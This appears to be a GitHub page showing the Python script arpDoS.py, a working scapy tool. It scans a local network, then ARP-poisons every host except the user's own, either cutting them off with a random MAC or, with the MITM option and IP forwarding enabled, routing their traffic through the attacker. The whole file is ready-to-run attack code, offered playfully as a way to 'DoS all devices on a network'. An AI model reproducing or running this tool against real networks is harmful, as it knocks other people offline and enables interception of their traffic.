-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy patharpDoS.py
190 lines (155 loc) · 5.64 KB
/
arpDoS.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
import argparse, random, socket, sys, time, os, pickle
try:
from scapy.all import Ether, srp, conf, ARP, send, get_if_hwaddr
except ImportError:
print("Scapy could not be imported.")
print("Make sure to 'pip3 install scapy'")
sys.exit(0)
# Global variables
myIP = socket.gethostbyname(socket.gethostname())
conf.verb=0
exceptions = []
# Checks for arguments and privileges
def checks():
# Check OS
if sys.platform.lower() != "linux":
print("This script only works in Linux!")
sys.exit(0)
# Check root
if os.getuid() != 0:
print("Must run as root!")
sys.exit(0)
# Check interface
if not args.interface:
print("No interface given. Exiting...")
sys.exit(0)
# Check network
if not args.network:
print("No network given. Exiting...")
sys.exit(0)
# Check gateway
if not args.gateway:
print("No gateway given. Exiting...")
sys.exit(0)
# Check exceptions
if args.file:
getExceptions(args.file)
# Gets MAC from IP
def getMAC(ip, interface):
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=2, iface=interface, inter=0.2)
for snd, rcv in ans:
MAC = rcv.sprintf(r"%Ether.src%")
return MAC
# Generates a random MAC
def randomMac():
generated = ""
for i in range(0,6):
generated += ":" + hex(random.randint(0,255))[2:]
return generated[1:]
def enableForwarding():
print("Enabling IP forwarding for MITM...")
result = os.system("sysctl -w net.ipv4.ip_forward=1")
if result ==0:
print("Done")
else:
print("An error ocurred enabling IP forwarding")
sys.exit(0)
def disableForwarding():
print("Disabling IP forwarding...")
result = os.system("sysctl -w net.ipv4.ip_forward=0")
if result ==0:
print("Done")
else:
print("An error ocurred disabling IP forwarding")
sys.exit(0)
# Returns a list with all IPs on the network
def scan(network, interface):
try:
print(f"Scanning {network} on {interface}...")
ips = {}
# Send ARP queries
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst = network), timeout=2, iface=interface, inter=0.1)
# Get responses
print("Found hosts:")
for snd, rcv in ans:
print(rcv.sprintf(r"%Ether.src% - %ARP.psrc%"))
ips[rcv.sprintf(r"%ARP.psrc%")] = rcv.sprintf(r"%Ether.src%")
print("")
return erase(ips, exceptions)
except KeyboardInterrupt:
print("User interrupt. Exitting...")
sys.exit(0)
# Get all IPs from the exceptions file
def getExceptions(file):
try:
lines = open(file)
for line in lines.readlines():
exceptions.append(line.rstrip())
lines.close()
except FileNotFoundError:
print(f"The file {file} couldn't be found")
# Erases exceptions from the list of victims (also deletes your IP)
def erase(ips, exceptions):
# Delete your IP so you may have Internet
if myIP in ips:
del ips[myIP]
# If provided, deletes all exceptions from the list of victims
if len(exceptions) != 0:
for IP in exceptions:
if IP in ips:
del ips[IP]
return ips
# ARP poison victims
def arp_poison(gateway_ip, target_ips):
print("Starting attack... [Ctrl+C to stop]")
try:
gateway_mac = target_ips[gateway_ip]
while True:
for target_ip in target_ips:
if target_ip != gateway_ip:
target_mac = target_ips[target_ip]
send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip, hwsrc=MAC))
send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip, hwsrc=MAC))
except KeyboardInterrupt:
print("Attack interrupted. Restoring network...")
restoreNetwork(gateway_ip, target_ips)
# Restores network broadcasting ARP replies with correct MAC and IP
def restoreNetwork(gateway_ip, target_ips):
gateway_mac = target_ips[gateway_ip]
for target_ip in target_ips:
target_mac = target_ips[target_ip]
send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=target_mac, psrc=target_ip), count=20)
send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=20)
print("Network restored")
# Parse args
DESCRIPTION = "a command line tool to DoS all devices on a network (except yourself :D)"
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-i", "--interface", help="Interface to use")
parser.add_argument("-n", "--network", help="Network to DoS")
parser.add_argument("-g", "--gateway", help="Gateway IP")
parser.add_argument("-f", "--file", help="List of IPs to exclude from the attack (one per line)")
parser.add_argument("-m", "--mitm", action="store_true", help="Use MITM instead")
parser.add_argument("-c", "--cache", action="store_true", help="Used saved IPs")
args = parser.parse_args()
#Run checks
checks()
interface = args.interface
network = args.network
gateway = args.gateway
try:
# Get my own MAC for MITM, or use random one for DoS
if args.mitm:
MAC = get_if_hwaddr(interface)
enableForwarding()
else:
MAC = randomMac()
if args.cache:
target_ips = pickle.load(open("targets.pickle", "rb"))
else:
target_ips = scan(network, interface)
pickle.dump(target_ips, open("targets.pickle", "wb"))
arp_poison(gateway, target_ips)
except KeyboardInterrupt:
print("User interrupt. Exiting...")
if args.mitm:
disableForwarding()